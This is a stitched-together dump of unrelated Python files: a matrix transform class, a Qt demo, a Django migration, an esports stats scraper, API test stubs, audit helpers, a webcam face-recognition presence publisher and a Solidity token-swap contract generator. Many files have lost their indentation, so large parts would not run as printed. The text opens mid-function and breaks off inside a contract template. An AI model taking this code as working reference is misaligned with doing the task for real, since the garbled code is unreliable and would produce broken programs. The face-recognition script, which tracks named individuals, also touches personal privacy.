    # newline='' lets the csv module handle line endings itself
    with open(CSVFile, 'w', newline='', encoding='utf-8') as csvfile:
        wr = csv.writer(csvfile, quoting=csv.QUOTE_ALL)
        for rownum in range(worksheet.nrows):
            wr.writerow(worksheet.row_values(rownum))
Excel2CSV()
| python |
import numpy as np
import os
class Lay(object):
    def __init__(self):
        self.__m = None
        self.__r = None
        self.__s = None
        self.m_world = None
        self.m_world_inv = None
        self.is_ready = False
def set(self, move=np.eye(4), rotate=np.eye(4), scale=np.eye(4)):
        if type(move) != np.ndarray or move.shape != (4, 4):
            raise Exception('Parameter `move` must be a 4x4 numpy.ndarray.')
        if type(rotate) != np.ndarray or rotate.shape != (4, 4):
            raise Exception('Parameter `rotate` must be a 4x4 numpy.ndarray.')
        if type(scale) != np.ndarray or scale.shape != (4, 4):
            raise Exception('Parameter `scale` must be a 4x4 numpy.ndarray.')
self.__m = move
self.__r = rotate
self.__s = scale
self.__calculate()
    def set_by_file(self, file_path):
        # read file
        with open(os.path.split(os.path.realpath(__file__))[0] + os.sep + file_path) as file:
            line_list = file.readlines()
        for line in line_list:
            line_split = line.split()
            if len(line_split) <= 0:
                continue
            elif line_split[0] == 'move':
                self.__m = self.__parse_matrix(line_split)
            elif line_split[0] == 'rotate':
                self.__r = self.__parse_matrix(line_split)
            elif line_split[0] == 'scale':
                self.__s = self.__parse_matrix(line_split)
        self.__calculate()
    @staticmethod
    def __parse_matrix(line_split):
        # Build a 4x4 matrix from the 16 float tokens following the keyword
        return np.array([float(v) for v in line_split[1:17]]).reshape(4, 4)
def __calculate(self):
self.m_world = np.dot(np.dot(self.__m, self.__r), self.__s)
self.m_world_inv = np.linalg.inv(self.m_world)
self.is_ready = True
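if __name__ == '__main__':
    # Minimal demo: compose a +2 translation along x with identity rotation/scale.
    move = np.eye(4)
    move[0, 3] = 2.0
    lay = Lay()
    lay.set(move=move)
    print(lay.m_world)      # world matrix with the translation in the last column
    print(lay.m_world_inv)  # its inverse undoes the translation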
| python |
"""Class instance for Transformer
"""
import argparse
# pylint: disable=unused-argument
class Transformer():
"""Generic class for supporting transformers
"""
def __init__(self, **kwargs):
"""Performs initialization of class instance
Arguments:
kwargs: additional parameters passed into Transformer instance
"""
self.args = None
def add_parameters(self, parser: argparse.ArgumentParser) -> None:
"""Adds processing parameters to existing parameters
Arguments:
parser: instance of argparse
"""
# pylint: disable=no-self-use
def get_transformer_params(self, args: argparse.Namespace, metadata: list) -> dict:
"""Returns a parameter list for processing data
Arguments:
args: result of calling argparse.parse_args
metadata: the list of loaded metadata
Return:
A dictionary of parameter names and value to pass to transformer
"""
self.args = args
params = {}
return params
# pylint: disable=no-self-use
def retrieve_files(self, transformer_params: dict, metadata: list) -> tuple:
"""Retrieves files as needed to make them available for processing
Arguments:
transformer_params: the values returned from get_transformer_params() call
metadata: the loaded metadata
Return:
A tuple consisting of the return code and an optional error message.
Notes:
A negative return code is considered an error and an associated message, if specified,
will be treated as such.
"""
return 0, "everything's in order"
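# Sketch of a concrete transformer built on this base (argument name is illustrative):
# class PlotClipTransformer(Transformer):
#     def add_parameters(self, parser: argparse.ArgumentParser) -> None:
#         parser.add_argument('--threshold', type=float, default=0.5, help='clip threshold')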
| python |
#!/usr/bin/python3
# -*- coding: utf-8 -*-
import sys
from PySide2 import QtCore, QtGui, QtWidgets
class GraphicView(QtWidgets.QGraphicsView):
def __init__(self):
QtWidgets.QGraphicsView.__init__(self)
self.setWindowTitle("QGraphicsView")
scene = QtWidgets.QGraphicsScene(self)
scene.setSceneRect(0, 0, 160, 120)
self.setScene(scene)
line = QtCore.QLineF(10,10,100,100)
node = QtWidgets.QGraphicsLineItem(line)
scene.addItem(node)
if __name__ == "__main__":
app = QtWidgets.QApplication(sys.argv)
widget = GraphicView()
widget.show()
sys.exit(app.exec_())
| python |
# Generated by Django 3.2.7 on 2021-09-27 15:01
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('rgd_fmv', '0001_initial'),
]
operations = [
migrations.AlterField(
model_name='fmv',
name='status',
field=models.CharField(
choices=[
('created', 'Created but not queued'),
('queued', 'Queued for processing'),
('running', 'Processing'),
('failed', 'Failed'),
('success', 'Succeeded'),
('skipped', 'Skipped'),
],
default='created',
max_length=20,
),
),
]
| python |
from bs4 import BeautifulSoup
import requests
import re
from graph import Graph
from player import Player
class Crawler:
    def __init__(self, link_root="https://www.hltv.org/stats/teams"):
        self.link_root = link_root
        self.headers = {}
        self.headers["User-Agent"] = "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36"
        self.headers["Referer"] = "https://www.hltv.org/stats/teams"
self.grafo = Graph()
def get_page(self, link):
return requests.get(link,headers=self.headers)
def walk_teams(self):
page = self.get_page(self.link_root)
soup = BeautifulSoup(page.text, 'html.parser')
for team in soup.find_all("td", {"class":"teamCol-teams-overview"}):
link_team = self.link_root + "/lineups/" + team.a['href'][13:]
self.get_lineups(link_team)
def get_lineups(self,link_team):
page = self.get_page(link_team)
soup = BeautifulSoup(page.text,'html.parser')
for line in soup.find_all("div",{"class":"lineup-container"}):
self.extract_players(line)
def connect_lineup(self,list_players):
for i in range(len(list_players)):
list_players[i] = self.grafo.add_player(list_players[i])
for i in range(len(list_players) - 1) :
for j in range( i + 1, len(list_players)):
self.grafo.connect(list_players[i].identificador,list_players[j].identificador)
def extract_players(self, line):
line_player = []
for raw_player in line.find_all("div", {"class":"col teammate"}):
p = Player()
p.conexoes = []
p.foto = raw_player.img['src']
p.nome = re.match(r'/stats/players/\d+/(.+)',raw_player.div.a['href']).group(1)
p.nacionalidade = raw_player.div.img['alt']
line_player.append(p)
self.connect_lineup(line_player)
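# Example: crawl every team's lineups and build the player graph (hits hltv.org):
# crawler = Crawler()
# crawler.walk_teams()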
| python |
from flask_wtf import FlaskForm
class NameForm(FlaskForm):
pass
| python |
# coding: utf-8
"""
MailSlurp API
MailSlurp is an API for sending and receiving emails from dynamically allocated email addresses. It's designed for developers and QA teams to test applications, process inbound emails, send templated notifications, attachments, and more. ## Resources - [Homepage](https://www.mailslurp.com) - Get an [API KEY](https://app.mailslurp.com/sign-up/) - Generated [SDK Clients](https://www.mailslurp.com/docs/) - [Examples](https://github.com/mailslurp/examples) repository # noqa: E501
The version of the OpenAPI document: 6.5.2
Generated by: https://openapi-generator.tech
"""
from __future__ import absolute_import
import unittest
import mailslurp_client
from mailslurp_client.api.expired_controller_api import ExpiredControllerApi # noqa: E501
from mailslurp_client.rest import ApiException
class TestExpiredControllerApi(unittest.TestCase):
"""ExpiredControllerApi unit test stubs"""
def setUp(self):
self.api = mailslurp_client.api.expired_controller_api.ExpiredControllerApi() # noqa: E501
def tearDown(self):
pass
def test_get_expiration_defaults(self):
"""Test case for get_expiration_defaults
Get default expiration settings # noqa: E501
"""
pass
def test_get_expired_inbox_by_inbox_id(self):
"""Test case for get_expired_inbox_by_inbox_id
Get expired inbox record for a previously existing inbox # noqa: E501
"""
pass
def test_get_expired_inbox_record(self):
"""Test case for get_expired_inbox_record
Get an expired inbox record # noqa: E501
"""
pass
def test_get_expired_inboxes(self):
"""Test case for get_expired_inboxes
List records of expired inboxes # noqa: E501
"""
pass
if __name__ == '__main__':
unittest.main()
| python |
""""""
import pytest
import random
import tempfile
from textwrap import dedent
from unittest import mock
from pybryt.utils import *
from .test_reference import generate_reference_notebook
def test_filter_picklable_list():
"""
"""
l = [1, 2, 3]
filter_picklable_list(l)
assert len(l) == 3
with mock.patch("dill.dumps") as mocked_dill:
mocked_dill.side_effect = Exception()
filter_picklable_list(l)
assert len(l) == 0
def test_notebook_to_string():
"""
"""
ref = generate_reference_notebook()
s = notebook_to_string(ref)
assert s.strip() == dedent("""\
import pybryt
def median(S):
sorted_S = sorted(S)
pybryt.Value(sorted_S, name="sorted", group="median", limit=5, success_message="SUCCESS: Sorted the sample correctly",
failure_message="ERROR: The sample was not sorted")
size_of_set = len(S)
pybryt.Value(size_of_set, name="size", group="median", success_message = "SUCCESS: Computed the size of the sample",
failure_message="ERROR: Did not capture the size of the set to determine if it is odd or even")
middle = size_of_set // 2
is_set_size_even = (size_of_set % 2) == 0
if is_set_size_even:
return (sorted_S[middle-1] + sorted_S[middle]) / 2
else:
return sorted_S[middle]
import numpy as np
np.random.seed(42)
for _ in range(10):
vals = [np.random.randint(-1000, 1000) for _ in range(np.random.randint(1, 1000))]
val = median(vals)
pybryt.Value(val, name="median", group="median", success_message="SUCCESS: computed the correct median",
failure_message="ERROR: failed to compute the median")
""").strip()
with pytest.raises(TypeError, match="invalid notebook type"):
notebook_to_string(1)
def test_make_secret():
"""
"""
random.seed(42)
s = make_secret()
print(s)
assert s == "HBRPOI"
def test_save_notebook():
"""
"""
with mock.patch("pybryt.utils.get_ipython") as mocked_get:
with mock.patch("pybryt.utils.publish_display_data") as mocked_pub:
mocked_get.return_value = True
with tempfile.NamedTemporaryFile(suffix=".ipynb") as ntf:
v = save_notebook(ntf.name, timeout=1)
mocked_pub.assert_called()
assert not v
| python |
#!/usr/bin/env python
# -*- encoding: utf-8 -*-
'''
@File        :audit_utils.py
@Description :
@Time        :2020/07/21 16:38:22
@Author      :Riven
@Version     :1.0.0
'''
import base64, logging, socket, sys
sys.path.append('.')
from app_server.src.utils.collection_utils import get_first_existing
from app_server.src.utils.tornado_utils import get_proxied_ip
HOSTNAME = 'hostname'
IP = 'ip'
PROXIED_USERNAME = 'proxied_username'
PROXIED_IP = 'proxied_ip'
PROXIED_HOSTNAME = 'proxied_hostname'
AUTH_USERNAME = 'auth_username'
LOGGER = logging.getLogger('script_server.audit_utils')
def get_all_audit_names(request_handler):
result = {}
auth_username = request_handler.application.identification.identify_for_audit(request_handler)
if auth_username:
result[AUTH_USERNAME] = auth_username
basic_auth_username = find_basic_auth_username(request_handler)
if basic_auth_username:
result[PROXIED_USERNAME] = basic_auth_username
proxied_ip = get_proxied_ip(request_handler)
if proxied_ip:
        result[PROXIED_IP] = proxied_ip
proxied_hostname = _resolve_hostname(proxied_ip)
if proxied_hostname:
result[PROXIED_HOSTNAME] = proxied_hostname
remote_ip = request_handler.request.remote_ip
result[IP] = remote_ip
hostname = _resolve_hostname(remote_ip)
if hostname:
result[HOSTNAME] = hostname
return result
def _resolve_hostname(ip):
try:
(hostname, _, _) = socket.gethostbyaddr(ip)
return hostname
    except Exception:
        LOGGER.warning('Could not get hostname for ' + ip)
return None
def get_audit_name(all_audit_names):
audit_types = [AUTH_USERNAME, PROXIED_USERNAME, PROXIED_HOSTNAME, PROXIED_IP, HOSTNAME, IP]
for name_type in audit_types:
name = all_audit_names.get(name_type)
if name:
return name
return None
def get_audit_name_from_request(request_handler):
audit_names = get_all_audit_names(request_handler)
return get_audit_name(audit_names)
def find_basic_auth_username(request_handler):
auth_header = request_handler.request.headers.get('Authorization')
if (auth_header is None) or (not auth_header.lower().startswith('basic')):
return None
encoding = sys.getdefaultencoding()
credential_bytes = base64.b64decode(auth_header[6:])
credentials = credential_bytes.decode(encoding)
username = credentials.split(':')[0]
return username
def get_audit_username(all_audit_names):
return get_first_existing(all_audit_names, AUTH_USERNAME, PROXIED_USERNAME)
if __name__ == '__main__':
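    # Minimal demo (hypothetical values; assumes get_first_existing returns
    # the first value present among the given keys): the authenticated
    # username wins over host/IP identifiers.
    demo_names = {AUTH_USERNAME: 'alice', HOSTNAME: 'host.example.com'}
    print(get_audit_name(demo_names))      # -> alice
    print(get_audit_username(demo_names))  # -> alice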
    print(__file__) | python
#!/home/jeffmur/archiconda3/envs/face_recon/bin/python3
import face_recognition
import cv2
import numpy as np
import pickle
from pathlib import Path
from datetime import datetime
import signal,sys,time
from google.cloud import pubsub_v1
# TODO (developer config)
project_id = "{GOOGLE_CLOUD_PROJECT_ID}"
topic_id = "{GOOGLE_PUB_SUB_ENDPOINT}"
# end config
publisher = pubsub_v1.PublisherClient()
topic_path = publisher.topic_path(project_id, topic_id)
minDelta = 3 # seconds between publish events
class User:
    # Initialization
def __init__(self, name, picturePath):
self.active = False
self.name = name
self.picture = picturePath
self.postTime = datetime.now()
def publishStatus(self):
if(self.active):
print(f"[{datetime.now()}] -- {self.name} Detected")
else:
print(f"[{datetime.now()}] -- {self.name} Left")
# Else publish event
status = "ACTIVE" if self.active else "LEFT"
data = f"{self.name}-{status}" #, self.keyIter)
# Data must be a bytestring
data = data.encode("utf-8")
# Add two attributes, origin and username, to the message
publisher.publish(
topic_path, data, update=status, user=str(self.name)
)
def updateStatus(self, isThere):
# Only send data every {delta} seconds
current_time = datetime.now()
diff = current_time - self.postTime
total = diff.total_seconds()
if(total <= minDelta): return
self.postTime = current_time
if(self.active != isThere):
self.active = isThere
self.publishStatus()
def newEncoding(self):
p = Path(f"{self.name}_face.dat")
if(not p.exists()):
# Load a sample picture and learn how to recognize it.
user_image = face_recognition.load_image_file(self.picture)
            try:
                user_face_encoding = face_recognition.face_encodings(user_image)[0]
            except IndexError as error:
                raise ValueError("No face recognized, please supply a higher resolution image!") from error
with open(f"{self.name}_face.dat", "wb") as face_data_file:
pickle.dump(user_face_encoding, face_data_file)
print(f"{self.name} face saved to disk.")
return user_face_encoding
        else:
            print(f"Loading {self.name} face from cache")
            return self.loadEncoding()
def loadEncoding(self):
try:
with open(f"{self.name}_face.dat", "rb") as face_data_file:
user_face_encoding = pickle.load(face_data_file)
print(f"Success! -- Loaded {self.name}")
return user_face_encoding
except FileNotFoundError as e:
print("No previous face data found - saving a new face!")
return self.newEncoding()
# Get a reference to webcam #0 (the default one)
video_capture = cv2.VideoCapture(0)
## Images and Names
# TODO: Users and local encodings
known_users = [User("Bob", "path/to/Bob.jpg"), User("Alice", "path/to/Alice.jpg"), User("Kevin", "path/to/Kevin.jpg")]
# Create arrays of known face encodings and their names
known_face_encodings = [x.loadEncoding() for x in known_users]
known_face_names = [x.name for x in known_users]
# Initialize some variables
face_locations = []
face_encodings = []
face_names = []
process_this_frame = True
# Graceful exit
terminate = False
def signal_handling(signum,frame):
global terminate
terminate = True
print("Ready")
while True:
signal.signal(signal.SIGINT,signal_handling)
if terminate:
print('\n')
video_capture.release()
break
# Grab a single frame of video
ret, frame = video_capture.read()
# Resize frame of video to 1/4 size for faster face recognition processing
small_frame = cv2.resize(frame, (0, 0), fx=0.25, fy=0.25)
# Convert the image from BGR color (which OpenCV uses) to RGB color (which face_recognition uses)
rgb_small_frame = small_frame[:, :, ::-1]
# Only process every other frame of video to save time
if process_this_frame:
# Find all the faces and face encodings in the current frame of video
face_locations = face_recognition.face_locations(rgb_small_frame)
face_encodings = face_recognition.face_encodings(rgb_small_frame, face_locations)
# "Leaving" if face is not detected, set all status to false
if(face_encodings == []):
for user in known_users:
user.updateStatus(False)
face_names = []
for face_encoding in face_encodings:
# See if the face is a match for the known face(s)
matches = face_recognition.compare_faces(known_face_encodings, face_encoding)
name = "Unknown"
if(np.any(matches)):
# Use the known face with the smallest distance to the new face
face_distances = face_recognition.face_distance(known_face_encodings, face_encoding)
best_match_index = np.argmin(face_distances)
if matches[best_match_index]:
name = known_face_names[best_match_index]
for u in known_users:
if(name == u.name): u.updateStatus(True)
face_names.append(name)
process_this_frame = not process_this_frame
# Display the results - Testing
# for (top, right, bottom, left), name in zip(face_locations, face_names):
# # Scale back up face locations since the frame we detected in was scaled to 1/4 size
# top *= 4
# right *= 4
# bottom *= 4
# left *= 4
# # Draw a box around the face
# cv2.rectangle(frame, (left, top), (right, bottom), (0, 0, 255), 2)
# # Draw a label with a name below the face
# cv2.rectangle(frame, (left, bottom - 35), (right, bottom), (0, 0, 255), cv2.FILLED)
# font = cv2.FONT_HERSHEY_DUPLEX
# cv2.putText(frame, name, (left + 6, bottom - 6), font, 1.0, (255, 255, 255), 1)
# # Display the resulting image
# cv2.imshow('Video', frame)
# # Hit 'q' on the keyboard to quit!
# if cv2.waitKey(1) & 0xFF == ord('q'):
# break
# Release handle to the webcam
# cv2.destroyAllWindows()
| python |
from eeval.evaluator import evaluate
from math import pi
import timeit
exprs = (
"2+2*2",
"(2+2)+(2+2)",
"-(2+2)+(-(2+2))",
"(2+2)*(-(2+2))",
"-(-(-(-(3*88888))))",
"pi*2",
"(pi+1)*(pi+2)",
"-pi",
"pi^2"
)
constants = {
"pi": pi
}
itercount = 1000
print("Evaluator test:")
for expr in exprs:
print(expr, "=", evaluate(expr, constants=constants),
"timeit: ", end="", flush=True)
print(timeit.timeit("e(expr, constants=c)", globals={
"e": evaluate, "expr": expr, "c": constants}, number=itercount)) | python |
from typing import Dict
from smartz.api.constructor_engine import ConstructorInstance
def is_true(arr, key):
return key in arr and bool(arr[key])
class Constructor(ConstructorInstance):
_SWAP_TYPE_ETHER = 'Ether'
_SWAP_TYPE_TOKENS = 'ERC20 tokens'
def __init__(self):
self._TEMPLATES: Dict[str, str] = {
self._SWAP_TYPE_ETHER: self._TEMPLATE_TOKENS_FOR_ETHER,
self._SWAP_TYPE_TOKENS: self._TEMPLATE_TOKENS_FOR_TOKENS
}
self._CHECK_TRANSFER1: Dict[str, str] = {
self._SWAP_TYPE_ETHER: self._TEMPLATE_TOKENS_FOR_ETHER_CHECK_TRANSFER1,
self._SWAP_TYPE_TOKENS: self._TEMPLATE_TOKENS_FOR_TOKENS_CHECK_TRANSFER1
}
self._CHECK_TRANSFER2: Dict[str, str] = {
self._SWAP_TYPE_ETHER: self._TEMPLATE_TOKENS_FOR_ETHER_CHECK_TRANSFER2,
self._SWAP_TYPE_TOKENS: self._TEMPLATE_TOKENS_FOR_TOKENS_CHECK_TRANSFER2
}
def get_version(self):
return {
"result": "success",
"version": 1
}
def get_params(self):
json_schema = {
"type": "object",
"required": ["participant1", "participant2"],
"additionalProperties": False,
"properties": {
"participant1": {
"type": "object",
"title": "Participant #1",
"required": ["token", "count"],
"properties": {
"use_my_address": {
"type": "boolean",
"title": "Use my address",
"description": "Deployer's address would be got as participant #1 address",
"default": True
},
"token": {
"title": "Token address",
"description": "Address of ERC20 token smart contract, which participant #1 will swap",
"$ref": "#/definitions/address"
},
"count": {
"title": "Tokens count",
"description": "Tokens count, which participant #1 will swap for participant #2 tokens/ether. Token decimals must be <= 18",
"type": "string",
"pattern": "^([1-9][0-9]{0,54}|[0-9]{1,55}\.[0-9]{0,17}[1-9])$"
}
},
"dependencies": {
"use_my_address": {
"oneOf": [
{
"properties": {
"use_my_address": {
"enum": [
True
]
},
},
},
{
"properties": {
"use_my_address": {
"enum": [
False
]
},
"address": {
"title": "Address",
"description": "Address where tokens/ether from participant #2 will be sent",
"$ref": "#/definitions/address"
},
},
"required": [
"address"
]
}
]
}
}
},
"participant2": {
"type": "object",
"title": "Participant #2",
"required": ["swap_type"],
"properties": {
"swap_type": {
"title": "Swap type",
"description": "Swap tokens of participant #1 for participant's #2:",
"type": "string",
"enum": [
self._SWAP_TYPE_ETHER,
self._SWAP_TYPE_TOKENS
],
"default": self._SWAP_TYPE_ETHER
},
"use_my_address": {
"type": "boolean",
"title": "Use my address",
"description": "Deployer's address would be got as participant #1 address",
"default": False
},
},
"dependencies": {
"use_my_address": {
"oneOf": [
{
"properties": {
"use_my_address": {
"enum": [
True
]
},
},
},
{
"properties": {
"use_my_address": {
"enum": [
False
],
},
"address": {
"title": "Address",
"description": "Address where tokens/ether from participant #1 will be sent",
"$ref": "#/definitions/address"
},
},
"required": [
"address"
]
}
]
},
"swap_type": {
"oneOf": [
{
"properties": {
"swap_type": {
"enum": [
self._SWAP_TYPE_ETHER
]
},
"count": {
"title": "Ether count",
"description": "Ether count, which participant #2 will swap for participant #2 tokens",
"type": "string",
"pattern": "^([1-9][0-9]{0,54}|[0-9]{1,55}\.[0-9]{0,17}[1-9])$"
}
},
"required": [
"count"
]
},
{
"properties": {
"swap_type": {
"enum": [
self._SWAP_TYPE_TOKENS
]
},
"token": {
"title": "Token address",
"description": "Address of ERC20 token smart contract, which participant #2 will swap",
"$ref": "#/definitions/address"
},
"count": {
"title": "Tokens count",
"description": "Tokens count, which participant #2 will swap for participant #1 tokens. . Token decimals must be <= 18",
"type": "string",
"pattern": "^([1-9][0-9]{0,54}|[0-9]{1,55}\.[0-9]{0,17}[1-9])$"
}
},
"required": [
"token", "count"
]
}
]
}
}
},
"check_transfers": {
"type": "boolean",
"title": "Verify token transfers",
"description": "Verify that token balances of participants after swap are greater for the amount of transfer (or more). If not, the transaction will be canceled.",
"default": True
},
}
}
ui_schema = {
"participant1": {
"ui:order": ["*", "token", "count"],
},
"participant2": {
"swap_type": {
"ui:widget": "radio",
}
}
}
return {
"result": "success",
"schema": json_schema,
"ui_schema": ui_schema
}
def construct(self, fields):
swap_type = fields['participant2']['swap_type']
part1 = fields['participant1']
part2 = fields['participant2']
errors = self._check_errors(part1, part2, swap_type)
if errors:
return {
"result": "error",
"errors": errors
}
source = self._TEMPLATES[swap_type]
source = self._fill_check_transfers_dependant_vars(fields, source, swap_type)
source = self._fill_main_vars(part1, part2, source)
source = self._fill_swap_type_dependant_vars(part2, source, swap_type)
return {
"result": "success",
'source': source,
'contract_name': "Swap"
}
def post_construct(self, fields, abi_array):
if fields['participant2']['swap_type'] == self._SWAP_TYPE_ETHER:
part2_type = 'ether'
else:
part2_type = 'tokens'
function_titles = {
'isFinished': {
'title': 'Is finished?',
'description': 'is swap finished',
'sorting_order': 10
},
'participant1': {
'title': 'Participant #1',
'description': 'Address of participant #1',
'sorting_order': 20
},
"participant1Token": {
"title": "Token address of participant #1",
"description": "Address of ERC20 token smart contract, which participant #1 will swap",
'sorting_order': 30
},
"participant1TokensCount": {
"title": "Tokens count of participant #1 (in token wei)",
"description": "Tokens count, which participant #1 will swap for participant #2 tokens/ether (in token wei)",
'sorting_order': 40
},
"participant1SentTokensCount": {
"title": "Tokens count sent by participant #1 (in token wei)",
"description": "Tokens count, which participant #1 has already sent (in token wei)",
'sorting_order': 50
},
'participant2': {
'title': 'Participant #2',
'description': 'Address of participant #2',
'sorting_order': 60
},
'swap': {
'title': 'Swap',
'description': 'Swap tokens of participant #1 to {} of participant #2'.format(part2_type),
'sorting_order': 100
},
'refund': {
'title': 'Refund',
'description': 'Refund tokens/ether to participants',
'sorting_order': 110
},
}
if fields['participant2']['swap_type'] == self._SWAP_TYPE_ETHER:
function_titles["participant2EtherCount"] = {
"title": "Ether count of participant #2 (in wei)",
"description": "Ether count, which participant #1 will swap for participant #2 tokens (in wei)",
'sorting_order': 70
}
function_titles["participant2SentEtherCount"] = {
"title": "Ether count sent by participant #2 (in wei)",
"description": "Ether count, which participant #2 has already sent (in wei)",
'sorting_order': 80
}
else:
function_titles["participant2Token"] = {
"title": "Token address of participant #2",
"description": "Address of ERC20 token smart contract, which participant #2 will swap",
'sorting_order': 70
}
function_titles["participant2TokensCount"] = {
"title": "Tokens count of participant #2 (in token wei)",
"description": "Tokens count, which participant #2 will swap for participant #1 tokens (in token wei)",
'sorting_order': 80
}
function_titles["participant2SentTokensCount"] = {
"title": "Tokens count sent by participant #2 (in token wei)",
"description": "Tokens count, which participant #2 has already sent (in token wei)",
'sorting_order': 90
}
return {
"result": "success",
'function_specs': function_titles,
'dashboard_functions': ['isFinished', 'participant1', 'participant2']
}
def _check_errors(self, part1, part2, swap_type):
""" Check additional errors"""
errors = {}
if "address" in part1 and "address" in part2 \
and part1['address'] == part2['address']:
errors['participant1'] = {
'address': "Participants addresses must be different"
}
if is_true(part1, "use_my_address") and is_true(part2, "use_my_address"):
errors['participant1'] = {
'use_my_address': "Participants addresses must be different"
}
if swap_type == self._SWAP_TYPE_TOKENS and part1['token'] == part2['token']:
if 'participant1' not in errors:
errors['participant1'] = {}
errors['participant1']['token'] = "Tokens addresses must be different"
return errors
def _fill_swap_type_dependant_vars(self, part2, source, swap_type):
if swap_type == self._SWAP_TYPE_ETHER:
source = source \
.replace('%_participant2EtherCount%', str(part2['count']))
else:
source = source \
.replace('%_participant2TokenAddress%', part2['token']) \
.replace('%_participant2TokensCount%', str(part2['count']))
return source
def _fill_main_vars(self, part1, part2, source):
part1_address = 'msg.sender' if is_true(part1, "use_my_address") else part1['address']
part2_address = 'msg.sender' if is_true(part2, "use_my_address") else part2['address']
source = source \
.replace('%erc20_basic%', self._TEMPLATE_ERC20) \
.replace('%_participant1%', part1_address) \
.replace('%_participant2%', part2_address) \
.replace('%_participant1TokenAddress%', part1['token']) \
.replace('%_participant1TokensCount%', str(part1['count']))
return source
def _fill_check_transfers_dependant_vars(self, fields, source, swap_type):
""" Fill check transfers templates"""
if 'check_transfers' in fields and fields['check_transfers']:
source = source \
.replace('%check_transfers1%', self._CHECK_TRANSFER1[swap_type]) \
.replace('%check_transfers2%', self._CHECK_TRANSFER2[swap_type])
else:
source = source \
.replace('%check_transfers1%', '') \
.replace('%check_transfers2%', '')
return source
# language=Solidity
_TEMPLATE_ERC20 = """
/**
* @title ERC20Basic
* @dev Simpler version of ERC20 interface
* @dev see https://github.com/ethereum/EIPs/issues/179
*/
contract ERC20Basic {
uint8 public decimals;
uint256 public totalSupply;
function balanceOf(address who) public view returns (uint256);
function transfer(address to, uint256 value) public returns (bool);
event Transfer(address indexed from, address indexed to, uint256 value);
}
"""
# language=Solidity
_TEMPLATE_TOKENS_FOR_ETHER = """
pragma solidity ^0.4.18;
%erc20_basic%
/**
* Copyright (C) 2018 Smartz, LLC
*
* Licensed under the Apache License, Version 2.0 (the "License").
* You may not use this file except in compliance with the License.
*
* Unless required by applicable law or agreed to in writing, software
* distributed under the License is distributed on an "AS IS" BASIS,
* WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND (express or implied).
*/
/**
* @title SwapTokenForEther
* Swap tokens of participant1 for ether of participant2
*
* @author Vladimir Khramov <[email protected]>
*/
contract Swap {
address public participant1;
address public participant2;
ERC20Basic public participant1Token;
uint256 public participant1TokensCount;
uint256 public participant2EtherCount;
bool public isFinished = false;
function Swap() public payable {
participant1 = %_participant1%;
participant2 = %_participant2%;
participant1Token = ERC20Basic(%_participant1TokenAddress%);
require(participant1Token.decimals() <= 18);
participant1TokensCount = %_participant1TokensCount% ether / 10**(18-uint256(participant1Token.decimals()));
participant2EtherCount = %_participant2EtherCount% ether;
assert(participant1 != participant2);
assert(participant1Token != address(0));
assert(participant1TokensCount > 0);
assert(participant2EtherCount > 0);
%payment_code%
}
/**
* Ether accepted
*/
function () external payable {
require(!isFinished);
require(msg.sender == participant2);
if (msg.value > participant2EtherCount) {
msg.sender.transfer(msg.value - participant2EtherCount);
}
}
/**
* Swap tokens for ether
*/
function swap() external {
require(!isFinished);
require(this.balance >= participant2EtherCount);
uint256 tokensBalance = participant1Token.balanceOf(this);
require(tokensBalance >= participant1TokensCount);
isFinished = true;
%check_transfers1%
require(participant1Token.transfer(participant2, participant1TokensCount));
if (tokensBalance > participant1TokensCount) {
require(
participant1Token.transfer(participant1, tokensBalance - participant1TokensCount)
);
}
participant1.transfer(this.balance);
%check_transfers2%
}
/**
* Refund tokens or ether by participants
*/
function refund() external {
if (msg.sender == participant1) {
uint256 tokensBalance = participant1Token.balanceOf(this);
require(tokensBalance>0);
participant1Token.transfer(participant1, tokensBalance);
} else if (msg.sender == participant2) {
require(this.balance > 0);
participant2.transfer(this.balance);
} else {
revert();
}
}
/**
* Tokens count sent by participant #1
*/
function participant1SentTokensCount() public view returns (uint256) {
return participant1Token.balanceOf(this);
}
/**
* Ether count sent by participant #2
*/
function participant2SentEtherCount() public view returns (uint256) {
return this.balance;
}
}
"""
# language=Solidity
_TEMPLATE_TOKENS_FOR_TOKENS = """
pragma solidity ^0.4.18;
%erc20_basic%
/**
* Copyright (C) 2018 Smartz, LLC
*
* Licensed under the Apache License, Version 2.0 (the "License").
* You may not use this file except in compliance with the License.
*
* Unless required by applicable law or agreed to in writing, software
* distributed under the License is distributed on an "AS IS" BASIS,
* WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND (express or implied).
*/
/**
* @title SwapTokenForToken
* Swap tokens of participant1 for tokens of participant2
*
* @author Vladimir Khramov <[email protected]>
*/
contract Swap {
address public participant1;
address public participant2;
ERC20Basic public participant1Token;
uint256 public participant1TokensCount;
ERC20Basic public participant2Token;
uint256 public participant2TokensCount;
bool public isFinished = false;
/**
* Constructor
*/
function Swap() public payable {
participant1 = %_participant1%;
participant2 = %_participant2%;
participant1Token = ERC20Basic(%_participant1TokenAddress%);
require(participant1Token.decimals() <= 18);
participant1TokensCount = %_participant1TokensCount% ether / 10**(18-uint256(participant1Token.decimals()));
participant2Token = ERC20Basic(%_participant2TokenAddress%);
require(participant2Token.decimals() <= 18);
participant2TokensCount = %_participant2TokensCount% ether / 10**(18-uint256(participant2Token.decimals()));
assert(participant1 != participant2);
assert(participant1Token != participant2Token);
assert(participant1Token != address(0));
assert(participant2Token != address(0));
assert(participant1TokensCount > 0);
assert(participant2TokensCount > 0);
%payment_code%
}
/**
* No direct payments
*/
function() external {
revert();
}
/**
* Swap tokens for tokens
*/
function swap() external {
require(!isFinished);
uint256 tokens1Balance = participant1Token.balanceOf(this);
require(tokens1Balance >= participant1TokensCount);
uint256 tokens2Balance = participant2Token.balanceOf(this);
require(tokens2Balance >= participant2TokensCount);
isFinished = true;
%check_transfers1%
require(participant1Token.transfer(participant2, participant1TokensCount));
if (tokens1Balance > participant1TokensCount) {
require(
participant1Token.transfer(participant1, tokens1Balance - participant1TokensCount)
);
}
require(participant2Token.transfer(participant1, participant2TokensCount));
if (tokens2Balance > participant2TokensCount) {
require(
participant2Token.transfer(participant2, tokens2Balance - participant2TokensCount)
);
}
%check_transfers2%
}
/**
* Refund tokens by participants
*/
function refund() external {
if (msg.sender == participant1) {
uint256 tokens1Balance = participant1Token.balanceOf(this);
require(tokens1Balance > 0);
participant1Token.transfer(participant1, tokens1Balance);
} else if (msg.sender == participant2) {
